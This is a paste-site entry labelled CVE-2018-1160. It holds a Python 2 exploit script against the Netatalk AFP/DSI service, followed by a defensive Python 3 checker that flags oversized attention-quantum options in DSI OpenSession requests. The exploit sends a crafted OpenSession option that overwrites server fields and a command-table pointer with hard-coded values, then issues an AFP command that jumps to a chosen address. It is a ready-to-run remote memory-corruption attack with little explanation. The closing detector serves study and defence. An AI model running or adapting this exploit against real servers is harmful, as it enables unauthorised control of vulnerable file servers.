yadav2152003s

CVE-2018-1160

Apr 29th, 2021
```python
# Python 2 script (print statements, str-based byte buffers)
import socket
import struct
import sys

if len(sys.argv) != 3:
    sys.exit(0)

ip = sys.argv[1]
port = int(sys.argv[2])

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + ip + ":" + sys.argv[2]
sock.connect((ip, port))

dsi_payload = "\x00\x00\x40\x00" # client quantum
dsi_payload += '\x00\x00\x00\x00' # overwrites datasize
dsi_payload += struct.pack("I", 0xdeadbeef) # overwrites quantum
dsi_payload += struct.pack("I", 0xfeedface) # overwrites the ids
dsi_payload += struct.pack("Q", 0x63b660) # overwrite commands ptr

dsi_opensession = "\x01" # attention quantum option
dsi_opensession += struct.pack("B", len(dsi_payload)) # length
dsi_opensession += dsi_payload

dsi_header = "\x00" # "request" flag
dsi_header += "\x04" # open session command
dsi_header += "\x00\x01" # request id
dsi_header += "\x00\x00\x00\x00" # data offset
dsi_header += struct.pack(">I", len(dsi_opensession))
dsi_header += "\x00\x00\x00\x00" # reserved
dsi_header += dsi_opensession

sock.sendall(dsi_header)
resp = sock.recv(1024)
print "[+] Open Session complete"

afp_command = "\x01" # invoke the second entry in the table
afp_command += "\x00" # protocol defined padding
afp_command += "\x00\x00\x00\x00\x00\x00" # pad out the first entry
afp_command += struct.pack("Q", 0x4295f0) # address to jump to

dsi_header = "\x00" # "request" flag
dsi_header += "\x02" # "AFP" command
dsi_header += "\x00\x02" # request id
dsi_header += "\x00\x00\x00\x00" # data offset
dsi_header += struct.pack(">I", len(afp_command))
dsi_header += '\x00\x00\x00\x00' # reserved
dsi_header += afp_command

print "[+] Sending get server info request"
sock.sendall(dsi_header)
resp = sock.recv(1024)
print resp
print "[+] Fin."
```
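The paste above sends a DSI OpenSession request whose attention-quantum option (type 0x01) carries far more than the 4-byte quantum value the option is defined to hold. As an added defensive example (not part of the paste), the Python 3 code below parses a DSI header and its OpenSession options and flags any attention-quantum option whose length is not 4 bytes, or whose length runs past the declared body; the sample requests are constructed inline, and the constant names are the author's own.

```python
import struct

DSI_HEADER_LEN = 16        # flags, command, request id, data offset, data length, reserved
DSI_OPEN_SESSION = 4       # DSI command byte for OpenSession
OPT_ATTENTION_QUANTUM = 1  # OpenSession option type carrying the 4-byte quantum
EXPECTED_QUANTUM_LEN = 4   # legitimate size of the attention-quantum value


def parse_dsi_header(data):
    """Return (flags, command, request_id, data_offset, data_len) from a 16-byte DSI header."""
    if len(data) < DSI_HEADER_LEN:
        raise ValueError("short DSI header")
    flags, command, request_id, data_offset, data_len, _reserved = struct.unpack(
        ">BBHIII", data[:DSI_HEADER_LEN])
    return flags, command, request_id, data_offset, data_len


def check_open_session(data):
    """Inspect one DSI request; return a list of findings (empty when nothing is suspicious)."""
    findings = []
    _flags, command, _req_id, _offset, data_len = parse_dsi_header(data)
    if command != DSI_OPEN_SESSION:
        return findings
    body = data[DSI_HEADER_LEN:DSI_HEADER_LEN + data_len]
    if len(body) != data_len:
        findings.append("declared body length %d but %d bytes present" % (data_len, len(body)))
    pos = 0
    while pos + 2 <= len(body):            # each option is type(1) + length(1) + value
        opt_type, opt_len = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + opt_len]
        if len(value) != opt_len:
            findings.append("option 0x%02x length %d runs past the body" % (opt_type, opt_len))
            break
        if opt_type == OPT_ATTENTION_QUANTUM and opt_len != EXPECTED_QUANTUM_LEN:
            findings.append("attention quantum option length %d, expected %d"
                            % (opt_len, EXPECTED_QUANTUM_LEN))
        pos += 2 + opt_len
    return findings


def build_open_session(options):
    """Construct a DSI OpenSession request from (type, value) option pairs (test helper)."""
    body = b"".join(bytes([opt_type, len(value)]) + value for opt_type, value in options)
    return struct.pack(">BBHIII", 0, DSI_OPEN_SESSION, 1, 0, len(body), 0) + body


# Constructed samples: a normal 4-byte quantum, and a 24-byte option shaped like the paste's payload.
BENIGN_REQUEST = build_open_session([(OPT_ATTENTION_QUANTUM, struct.pack(">I", 0x4000))])
OVERSIZED_REQUEST = build_open_session([(OPT_ATTENTION_QUANTUM, b"\x00\x00\x40\x00" + b"A" * 20)])
```

Running `check_open_session` over captured DSI traffic gives a simple IDS-style check; a legitimate client never needs an attention-quantum option longer than 4 bytes.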